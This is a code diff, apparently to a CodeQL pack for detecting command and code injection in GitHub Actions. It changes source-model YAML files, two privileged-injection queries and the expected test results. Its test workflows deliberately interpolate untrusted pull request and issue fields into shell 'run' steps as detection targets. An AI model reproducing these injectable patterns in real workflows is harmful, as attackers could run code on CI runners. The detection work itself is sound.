b/ql/lib/ext/ahmadnassri_action-changed-files.model.yml index 34cb56a01ad4..aabd5a3ce369 100644 --- a/ql/lib/ext/ahmadnassri_action-changed-files.model.yml +++ b/ql/lib/ext/ahmadnassri_action-changed-files.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sourceModel data: - - ["ahmadnassri/action-changed-files", "*", "output.files", "pull_request_target", "PR changed files"] - - ["ahmadnassri/action-changed-files", "*", "output.json", "pull_request_target", "PR changed files"] + - ["ahmadnassri/action-changed-files", "*", "output.files", "PR changed files"] + - ["ahmadnassri/action-changed-files", "*", "output.json", "PR changed files"] diff --git a/ql/lib/ext/amannn_action-semantic-pull-request.model.yml b/ql/lib/ext/amannn_action-semantic-pull-request.model.yml index c530a3af9b3c..638ff4497353 100644 --- a/ql/lib/ext/amannn_action-semantic-pull-request.model.yml +++ b/ql/lib/ext/amannn_action-semantic-pull-request.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sourceModel data: - - ["amannn/action-semantic-pull-request", "*", "output.error_message", "pull_request_target", "PR title"] + - ["amannn/action-semantic-pull-request", "*", "output.error_message", "PR title"] diff --git a/ql/lib/ext/cypress-io_github-action.model.yml b/ql/lib/ext/cypress-io_github-action.model.yml index 2fda092f20a5..0aaa1b0722ae 100644 --- a/ql/lib/ext/cypress-io_github-action.model.yml +++ b/ql/lib/ext/cypress-io_github-action.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sourceModel data: - - ["cypress-io/github-action", "*", "env.GH_BRANCH", "pull_request_target", "PR branch"] + - ["cypress-io/github-action", "*", "env.GH_BRANCH", "PR branch"] diff --git a/ql/lib/ext/dawidd6_action-download-artifact.model.yml b/ql/lib/ext/dawidd6_action-download-artifact.model.yml index a8a54dbda292..3bc1dcc4759d 100644 --- a/ql/lib/ext/dawidd6_action-download-artifact.model.yml +++ b/ql/lib/ext/dawidd6_action-download-artifact.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sourceModel data: - - ["dawidd6/action-download-artifact", "*", "output.artifacts", "*", "Artifact details"] + - ["dawidd6/action-download-artifact", "*", "output.artifacts", "Artifact details"] diff --git a/ql/lib/ext/dorny_paths-filter.model.yml b/ql/lib/ext/dorny_paths-filter.model.yml index 6fefec9a4f8f..41a9c337f490 100644 --- a/ql/lib/ext/dorny_paths-filter.model.yml +++ b/ql/lib/ext/dorny_paths-filter.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sourceModel data: - - ["dorny/paths-filter", "*", "output.changes", "pull_request_target", "PR changed files"] + - ["dorny/paths-filter", "*", "output.changes", "PR changed files"] diff --git a/ql/lib/ext/franzdiebold_github-env-vars-action.model.yml b/ql/lib/ext/franzdiebold_github-env-vars-action.model.yml index ffde7dc6a918..b6c75a06e576 100644 --- a/ql/lib/ext/franzdiebold_github-env-vars-action.model.yml +++ b/ql/lib/ext/franzdiebold_github-env-vars-action.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sourceModel data: - - ["franzdiebold/github-env-vars-action", "*", "output.CI_PR_DESCRIPTION", "pull_request_target", "PR body"] - - ["franzdiebold/github-env-vars-action", "*", "output.CI_PR_TITLE", "pull_request_target", "PR title"] + - ["franzdiebold/github-env-vars-action", "*", "output.CI_PR_DESCRIPTION", "PR body"] + - ["franzdiebold/github-env-vars-action", "*", "output.CI_PR_TITLE", "PR title"] diff --git a/ql/lib/ext/jitterbit_get-changed-files.model.yml b/ql/lib/ext/jitterbit_get-changed-files.model.yml index d7cbde25b88f..2e5b0d42efdc 100644 --- a/ql/lib/ext/jitterbit_get-changed-files.model.yml +++ b/ql/lib/ext/jitterbit_get-changed-files.model.yml @@ -3,10 +3,10 @@ extensions: pack: githubsecuritylab/actions-all extensible: sourceModel data: - - ["jitterbit/get-changed-files", "*", "output.all", "pull_request_target", "PR changed files"] - - ["jitterbit/get-changed-files", "*", "output.added", "pull_request_target", "PR changed files"] - - ["jitterbit/get-changed-files", "*", "output.modified", "pull_request_target", "PR changed files"] - - ["jitterbit/get-changed-files", "*", "output.removed", "pull_request_target", "PR changed files"] - - ["jitterbit/get-changed-files", "*", "output.renamed", "pull_request_target", "PR changed files"] - - ["jitterbit/get-changed-files", "*", "output.added_modified", "pull_request_target", "PR changed files"] - - ["jitterbit/get-changed-files", "*", "output.deleted", "pull_request_target", "PR changed files"] + - ["jitterbit/get-changed-files", "*", "output.all", "PR changed files"] + - ["jitterbit/get-changed-files", "*", "output.added", "PR changed files"] + - ["jitterbit/get-changed-files", "*", "output.modified", "PR changed files"] + - ["jitterbit/get-changed-files", "*", "output.removed", "PR changed files"] + - ["jitterbit/get-changed-files", "*", "output.renamed", "PR changed files"] + - ["jitterbit/get-changed-files", "*", "output.added_modified", "PR changed files"] + - ["jitterbit/get-changed-files", "*", "output.deleted", "PR changed files"] diff --git a/ql/lib/ext/khan_pull-request-comment-trigger.model.yml b/ql/lib/ext/khan_pull-request-comment-trigger.model.yml index b872bbe2ed04..18339bfa4e9b 100644 --- a/ql/lib/ext/khan_pull-request-comment-trigger.model.yml +++ b/ql/lib/ext/khan_pull-request-comment-trigger.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sourceModel data: - - ["khan/pull-request-comment-trigger", "*", "output.comment_body", "issue_comment", ""] - - ["khan/pull-request-comment-trigger", "*", "output.comment_body", "pull_request_comment", ""] + - ["khan/pull-request-comment-trigger", "*", "output.comment_body", "Comment body"] + - ["khan/pull-request-comment-trigger", "*", "output.comment_body", "Comment body"] diff --git a/ql/lib/ext/tj-actions_branch-names.model.yml b/ql/lib/ext/tj-actions_branch-names.model.yml index 1618eddf2d8e..a7afc090a91f 100644 --- a/ql/lib/ext/tj-actions_branch-names.model.yml +++ b/ql/lib/ext/tj-actions_branch-names.model.yml @@ -4,7 +4,7 @@ extensions: extensible: sourceModel data: # https://github.com/tj-actions/branch-names - - ["tj-actions/branch-names", "*", "output.current_branch", "pull_request_target", "PR current branch"] - - ["tj-actions/branch-names", "*", "output.head_ref_branch", "pull_request_target", "PR head branch"] - - ["tj-actions/branch-names", "*", "output.ref_branch", "pull_request_target", "Branch tirggering workflow run"] + - ["tj-actions/branch-names", "*", "output.current_branch", "PR current branch"] + - ["tj-actions/branch-names", "*", "output.head_ref_branch", "PR head branch"] + - ["tj-actions/branch-names", "*", "output.ref_branch", "Branch tirggering workflow run"] diff --git a/ql/lib/ext/tj-actions_changed-files.model.yml b/ql/lib/ext/tj-actions_changed-files.model.yml index 7c681d8a64b3..7890668fa878 100644 --- a/ql/lib/ext/tj-actions_changed-files.model.yml +++ b/ql/lib/ext/tj-actions_changed-files.model.yml @@ -3,20 +3,20 @@ extensions: pack: githubsecuritylab/actions-all extensible: sourceModel data: - - ["tj-actions/changed-files", "*", "output.added_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.copied_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.deleted_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.modified_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.renamed_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.all_old_new_renamed_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.type_changed_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.unmerged_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.unknown_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.all_changed_and_modified_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.all_changed_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.other_changed_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.all_modified_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.other_modified_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.other_deleted_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.modified_keys", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.changed_keys", "pull_request_target", "PR changed files"] \ No newline at end of file + - ["tj-actions/changed-files", "*", "output.added_files", "PR changed files"] + - ["tj-actions/changed-files", "*", "output.copied_files", "PR changed files"] + - ["tj-actions/changed-files", "*", "output.deleted_files", "PR changed files"] + - ["tj-actions/changed-files", "*", "output.modified_files", "PR changed files"] + - ["tj-actions/changed-files", "*", "output.renamed_files", "PR changed files"] + - ["tj-actions/changed-files", "*", "output.all_old_new_renamed_files", "PR changed files"] + - ["tj-actions/changed-files", "*", "output.type_changed_files", "PR changed files"] + - ["tj-actions/changed-files", "*", "output.unmerged_files", "PR changed files"] + - ["tj-actions/changed-files", "*", "output.unknown_files", "PR changed files"] + - ["tj-actions/changed-files", "*", "output.all_changed_and_modified_files", "PR changed files"] + - ["tj-actions/changed-files", "*", "output.all_changed_files", "PR changed files"] + - ["tj-actions/changed-files", "*", "output.other_changed_files", "PR changed files"] + - ["tj-actions/changed-files", "*", "output.all_modified_files", "PR changed files"] + - ["tj-actions/changed-files", "*", "output.other_modified_files", "PR changed files"] + - ["tj-actions/changed-files", "*", "output.other_deleted_files", "PR changed files"] + - ["tj-actions/changed-files", "*", "output.modified_keys", "PR changed files"] + - ["tj-actions/changed-files", "*", "output.changed_keys", "PR changed files"] diff --git a/ql/lib/ext/tj-actions_verify-changed-files.model.yml b/ql/lib/ext/tj-actions_verify-changed-files.model.yml index 9b6649892afa..1946b78f5fd3 100644 --- a/ql/lib/ext/tj-actions_verify-changed-files.model.yml +++ b/ql/lib/ext/tj-actions_verify-changed-files.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sourceModel data: - - ["tj-actions/verify-changed-files", "*", "output.changed-files", "pull_request_target", "PR changed files"] + - ["tj-actions/verify-changed-files", "*", "output.changed-files", "PR changed files"] diff --git a/ql/lib/ext/tzkhan_pr-update-action.model.yml b/ql/lib/ext/tzkhan_pr-update-action.model.yml index 6ce7dd68b3f0..d4b083e14d22 100644 --- a/ql/lib/ext/tzkhan_pr-update-action.model.yml +++ b/ql/lib/ext/tzkhan_pr-update-action.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sourceModel data: - - ["tzkhan/pr-update-action", "*", "output.headMatch", "pull_request_target", ""] + - ["tzkhan/pr-update-action", "*", "output.headMatch", ""] diff --git a/ql/lib/ext/xt0rted_slash-command-action.model.yml b/ql/lib/ext/xt0rted_slash-command-action.model.yml index 72df42535db9..31a1eb5bde91 100644 --- a/ql/lib/ext/xt0rted_slash-command-action.model.yml +++ b/ql/lib/ext/xt0rted_slash-command-action.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sourceModel data: - - ["xt0rted/slash-command-action", "*", "output.command-arguments", "issue_comment", ""] - - ["xt0rted/slash-command-action", "*", "output.command-arguments", "pull_request_comment", ""] + - ["xt0rted/slash-command-action", "*", "output.command-arguments", ""] + - ["xt0rted/slash-command-action", "*", "output.command-arguments", ""] diff --git a/ql/src/Security/CWE-078/PrivilegedCommandInjection.ql b/ql/src/Security/CWE-078/PrivilegedCommandInjection.ql index 6f66535e6a41..2f9a09f59c38 100644 --- a/ql/src/Security/CWE-078/PrivilegedCommandInjection.ql +++ b/ql/src/Security/CWE-078/PrivilegedCommandInjection.ql @@ -16,14 +16,16 @@ import actions import codeql.actions.security.CommandInjectionQuery import CommandInjectionFlow::PathGraph +predicate isSingleTriggerWorkflow(Workflow w, string trigger) { + w.getATriggerEvent() = trigger and + count(string t | w.getATriggerEvent() = t | t) = 1 +} + from CommandInjectionFlow::PathNode source, CommandInjectionFlow::PathNode sink, Workflow w where CommandInjectionFlow::flowPath(source, sink) and w = source.getNode().asExpr().getEnclosingWorkflow() and - ( - w instanceof ReusableWorkflow or - w.hasTriggerEvent(source.getNode().(RemoteFlowSource).getATriggerEvent()) - ) + not isSingleTriggerWorkflow(w, "pull_request") select sink.getNode(), source, sink, "Potential privileged command injection in $@, which may be controlled by an external user.", sink, sink.getNode().asExpr().(Expression).getRawExpression() diff --git a/ql/src/Security/CWE-094/PrivilegedCodeInjection.ql b/ql/src/Security/CWE-094/PrivilegedCodeInjection.ql index 69ab240616e6..62030e322633 100644 --- a/ql/src/Security/CWE-094/PrivilegedCodeInjection.ql +++ b/ql/src/Security/CWE-094/PrivilegedCodeInjection.ql @@ -18,14 +18,16 @@ import actions import codeql.actions.security.CodeInjectionQuery import CodeInjectionFlow::PathGraph +predicate isSingleTriggerWorkflow(Workflow w, string trigger) { + w.getATriggerEvent() = trigger and + count(string t | w.getATriggerEvent() = t | t) = 1 +} + from CodeInjectionFlow::PathNode source, CodeInjectionFlow::PathNode sink, Workflow w where CodeInjectionFlow::flowPath(source, sink) and w = source.getNode().asExpr().getEnclosingWorkflow() and - ( - w instanceof ReusableWorkflow or - w.hasTriggerEvent(source.getNode().(RemoteFlowSource).getATriggerEvent()) - ) + not isSingleTriggerWorkflow(w, "pull_request") select sink.getNode(), source, sink, "Potential privileged code injection in $@, which may be controlled by an external user.", sink, sink.getNode().asExpr().(Expression).getRawExpression() diff --git a/ql/test/library-tests/test.expected b/ql/test/library-tests/test.expected index 5395fe824535..a8a0414dd9f9 100644 --- a/ql/test/library-tests/test.expected +++ b/ql/test/library-tests/test.expected @@ -313,48 +313,46 @@ scopes | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | | .github/workflows/test.yml:1:1:40:53 | on: push | sources -| ahmadnassri/action-changed-files | * | output.files | pull_request_target | PR changed files | -| ahmadnassri/action-changed-files | * | output.json | pull_request_target | PR changed files | -| amannn/action-semantic-pull-request | * | output.error_message | pull_request_target | PR title | -| cypress-io/github-action | * | env.GH_BRANCH | pull_request_target | PR branch | -| dawidd6/action-download-artifact | * | output.artifacts | * | Artifact details | -| dorny/paths-filter | * | output.changes | pull_request_target | PR changed files | -| franzdiebold/github-env-vars-action | * | output.CI_PR_DESCRIPTION | pull_request_target | PR body | -| franzdiebold/github-env-vars-action | * | output.CI_PR_TITLE | pull_request_target | PR title | -| jitterbit/get-changed-files | * | output.added | pull_request_target | PR changed files | -| jitterbit/get-changed-files | * | output.added_modified | pull_request_target | PR changed files | -| jitterbit/get-changed-files | * | output.all | pull_request_target | PR changed files | -| jitterbit/get-changed-files | * | output.deleted | pull_request_target | PR changed files | -| jitterbit/get-changed-files | * | output.modified | pull_request_target | PR changed files | -| jitterbit/get-changed-files | * | output.removed | pull_request_target | PR changed files | -| jitterbit/get-changed-files | * | output.renamed | pull_request_target | PR changed files | -| khan/pull-request-comment-trigger | * | output.comment_body | issue_comment | | -| khan/pull-request-comment-trigger | * | output.comment_body | pull_request_comment | | -| octo-org/source-repo/.github/workflows/workflow.yml | * | output.workflow-output | * | Foo | -| tj-actions/branch-names | * | output.current_branch | pull_request_target | PR current branch | -| tj-actions/branch-names | * | output.head_ref_branch | pull_request_target | PR head branch | -| tj-actions/branch-names | * | output.ref_branch | pull_request_target | Branch tirggering workflow run | -| tj-actions/changed-files | * | output.added_files | pull_request_target | PR changed files | -| tj-actions/changed-files | * | output.all_changed_and_modified_files | pull_request_target | PR changed files | -| tj-actions/changed-files | * | output.all_changed_files | pull_request_target | PR changed files | -| tj-actions/changed-files | * | output.all_modified_files | pull_request_target | PR changed files | -| tj-actions/changed-files | * | output.all_old_new_renamed_files | pull_request_target | PR changed files | -| tj-actions/changed-files | * | output.changed_keys | pull_request_target | PR changed files | -| tj-actions/changed-files | * | output.copied_files | pull_request_target | PR changed files | -| tj-actions/changed-files | * | output.deleted_files | pull_request_target | PR changed files | -| tj-actions/changed-files | * | output.modified_files | pull_request_target | PR changed files | -| tj-actions/changed-files | * | output.modified_keys | pull_request_target | PR changed files | -| tj-actions/changed-files | * | output.other_changed_files | pull_request_target | PR changed files | -| tj-actions/changed-files | * | output.other_deleted_files | pull_request_target | PR changed files | -| tj-actions/changed-files | * | output.other_modified_files | pull_request_target | PR changed files | -| tj-actions/changed-files | * | output.renamed_files | pull_request_target | PR changed files | -| tj-actions/changed-files | * | output.type_changed_files | pull_request_target | PR changed files | -| tj-actions/changed-files | * | output.unknown_files | pull_request_target | PR changed files | -| tj-actions/changed-files | * | output.unmerged_files | pull_request_target | PR changed files | -| tj-actions/verify-changed-files | * | output.changed-files | pull_request_target | PR changed files | -| tzkhan/pr-update-action | * | output.headMatch | pull_request_target | | -| xt0rted/slash-command-action | * | output.command-arguments | issue_comment | | -| xt0rted/slash-command-action | * | output.command-arguments | pull_request_comment | | +| ahmadnassri/action-changed-files | * | output.files | PR changed files | +| ahmadnassri/action-changed-files | * | output.json | PR changed files | +| amannn/action-semantic-pull-request | * | output.error_message | PR title | +| cypress-io/github-action | * | env.GH_BRANCH | PR branch | +| dawidd6/action-download-artifact | * | output.artifacts | Artifact details | +| dorny/paths-filter | * | output.changes | PR changed files | +| franzdiebold/github-env-vars-action | * | output.CI_PR_DESCRIPTION | PR body | +| franzdiebold/github-env-vars-action | * | output.CI_PR_TITLE | PR title | +| jitterbit/get-changed-files | * | output.added | PR changed files | +| jitterbit/get-changed-files | * | output.added_modified | PR changed files | +| jitterbit/get-changed-files | * | output.all | PR changed files | +| jitterbit/get-changed-files | * | output.deleted | PR changed files | +| jitterbit/get-changed-files | * | output.modified | PR changed files | +| jitterbit/get-changed-files | * | output.removed | PR changed files | +| jitterbit/get-changed-files | * | output.renamed | PR changed files | +| khan/pull-request-comment-trigger | * | output.comment_body | Comment body | +| octo-org/source-repo/.github/workflows/workflow.yml | * | output.workflow-output | Foo | +| tj-actions/branch-names | * | output.current_branch | PR current branch | +| tj-actions/branch-names | * | output.head_ref_branch | PR head branch | +| tj-actions/branch-names | * | output.ref_branch | Branch tirggering workflow run | +| tj-actions/changed-files | * | output.added_files | PR changed files | +| tj-actions/changed-files | * | output.all_changed_and_modified_files | PR changed files | +| tj-actions/changed-files | * | output.all_changed_files | PR changed files | +| tj-actions/changed-files | * | output.all_modified_files | PR changed files | +| tj-actions/changed-files | * | output.all_old_new_renamed_files | PR changed files | +| tj-actions/changed-files | * | output.changed_keys | PR changed files | +| tj-actions/changed-files | * | output.copied_files | PR changed files | +| tj-actions/changed-files | * | output.deleted_files | PR changed files | +| tj-actions/changed-files | * | output.modified_files | PR changed files | +| tj-actions/changed-files | * | output.modified_keys | PR changed files | +| tj-actions/changed-files | * | output.other_changed_files | PR changed files | +| tj-actions/changed-files | * | output.other_deleted_files | PR changed files | +| tj-actions/changed-files | * | output.other_modified_files | PR changed files | +| tj-actions/changed-files | * | output.renamed_files | PR changed files | +| tj-actions/changed-files | * | output.type_changed_files | PR changed files | +| tj-actions/changed-files | * | output.unknown_files | PR changed files | +| tj-actions/changed-files | * | output.unmerged_files | PR changed files | +| tj-actions/verify-changed-files | * | output.changed-files | PR changed files | +| tzkhan/pr-update-action | * | output.headMatch | | +| xt0rted/slash-command-action | * | output.command-arguments | | summaries | akhileshns/heroku-deploy | * | input.branch | output.status | taint | | android-actions/setup-android | * | input.cmdline-tools-version | output.ANDROID_COMMANDLINE_TOOLS_VERSION | taint | diff --git a/ql/test/library-tests/test.ql b/ql/test/library-tests/test.ql index 268396a711e3..d56ec73e26ff 100644 --- a/ql/test/library-tests/test.ql +++ b/ql/test/library-tests/test.ql @@ -49,8 +49,8 @@ query predicate nodeLocations(DataFlow::Node n, Location l) { n.getLocation() = query predicate scopes(Cfg::CfgScope c) { any() } -query predicate sources(string action, string version, string output, string trigger, string kind) { - sourceModel(action, version, output, trigger, kind) +query predicate sources(string action, string version, string output, string kind) { + sourceModel(action, version, output, kind) } query predicate summaries(string action, string version, string input, string output, string kind) { diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_target.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_target.yml index 215b32528853..995fefe4a15e 100644 --- a/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_target.yml +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_target.yml @@ -4,8 +4,8 @@ jobs: echo-chamber: runs-on: ubuntu-latest steps: - - run: echo '${{ github.event.issue.title }}' # not defined - - run: echo '${{ github.event.issue.body }}' # not defined + - run: echo '${{ github.event.issue.title }}' # not defined for this trigger, but we will still report it + - run: echo '${{ github.event.issue.body }}' # not defined for this trigger, but we will still report it - run: echo '${{ github.event.pull_request.title }}' - run: echo '${{ github.event.pull_request.body }}' - run: echo '${{ github.event.pull_request.head.label }}' diff --git a/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected b/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected index e818ced0c1d7..7061f509b812 100644 --- a/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected @@ -230,6 +230,10 @@ subpaths | .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | ${{ github.event.pages[0].page_name }} | | .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | ${{ github.event.pages[2222].page_name }} | | .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | .github/workflows/image_link_generator.yml:18:18:18:49 | github.event.comment.body | .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | ${{ steps.trim-url.outputs.trimmed_url }} | +| .github/workflows/inter-job0.yml:43:20:43:53 | needs.job1.outputs.job_output | .github/workflows/inter-job0.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job0.yml:43:20:43:53 | needs.job1.outputs.job_output | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/inter-job0.yml:43:20:43:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | +| .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | .github/workflows/inter-job1.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | +| .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | .github/workflows/inter-job2.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | +| .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | .github/workflows/inter-job4.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | ${{ github.event.issue.title }} | | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | ${{ github.event.issue.body }} | | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | .github/workflows/issues.yaml:4:16:4:46 | github.event.issue.title | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | ${{ env.global_env }} | @@ -253,6 +257,8 @@ subpaths | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/pull_request_target.yml:7:19:7:49 | github.event.issue.title | .github/workflows/pull_request_target.yml:7:19:7:49 | github.event.issue.title | .github/workflows/pull_request_target.yml:7:19:7:49 | github.event.issue.title | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:7:19:7:49 | github.event.issue.title | ${{ github.event.issue.title }} | +| .github/workflows/pull_request_target.yml:8:19:8:48 | github.event.issue.body | .github/workflows/pull_request_target.yml:8:19:8:48 | github.event.issue.body | .github/workflows/pull_request_target.yml:8:19:8:48 | github.event.issue.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:8:19:8:48 | github.event.issue.body | ${{ github.event.issue.body }} | | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | @@ -271,6 +277,8 @@ subpaths | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | ${{ github.event.head_commit.committer.name }} | | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | ${{ github.event.commits[11].committer.email }} | | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | ${{ github.event.commits[11].committer.name }} | +| .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | .github/workflows/self_needs.yml:16:20:16:64 | github.event['head_commit']['message'] | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | ${{ steps.source.outputs.value }} | +| .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | 